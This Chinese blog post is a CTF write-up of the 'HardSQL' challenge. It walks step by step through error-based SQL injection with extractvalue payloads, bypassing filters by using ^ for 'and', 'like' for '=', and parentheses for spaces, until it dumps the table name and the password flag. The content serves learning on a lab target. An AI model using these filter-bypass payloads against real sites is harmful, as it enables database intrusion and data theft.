[极客大挑战 2019]HardSQL

记得比赛的时候我用的是报错注入

随便输入用户名和密码进行抓包。

 

 

 

用户名输入单引号之后报错，简单测试一下and or这些被过滤掉了

 

 

 

使用^异或符号替换and

 

 

 证明可以使用^替换，^符号未被过滤，添加报错注入的payload，报错注入的原理网上有很多优秀的文章，使用payload之前可以先看一下：

?

1	extractvalue(1,concat(0x7e,user(),0x7e))

　　添加到burpsuite里面就变成了（最后的^'1 是为了闭合引号）：

?

1	1%27^extractvalue(1,concat(0x7e,user(),0x7e))^'1

　　

 

 

 成功报错注出了数据库用户名

做的过程中发现还过滤了等号=和空格

 

 

 等号可以使用like来代替，空格使用()括号来代替

payload修改为：

?

1	1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like%27geek%27),0x7e))^'1

　　

 

 

 表名为：H4rDsq1

进一步获取数据：

?

1	1%27^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like%27H4rDsq1%27),0x7e))^'1

　　

应该是要获取password

?

1	1%27^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1

　　

 

 

 因为extractvalue和updatexml函数都只能一次最多显示32位，在原有payload基础上修改.

本来想用mid函数的，但是被过滤了，换right函数输出后面的flag

 

 payload修改为：

?

1	1%27^extractvalue(1,concat(0x7e,(select(group_concat(right(password,13)))from(H4rDsq1)),0x7e))^'1

　　

 

 与之前的flag拼接一下，注意这里我多出了几位，需要把重复的位数去除，就拿到完整的flag啦

 

__EOF__

本文作者：春告鳥
本文链接：https://www.cnblogs.com/Cl0ud/p/12767189.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！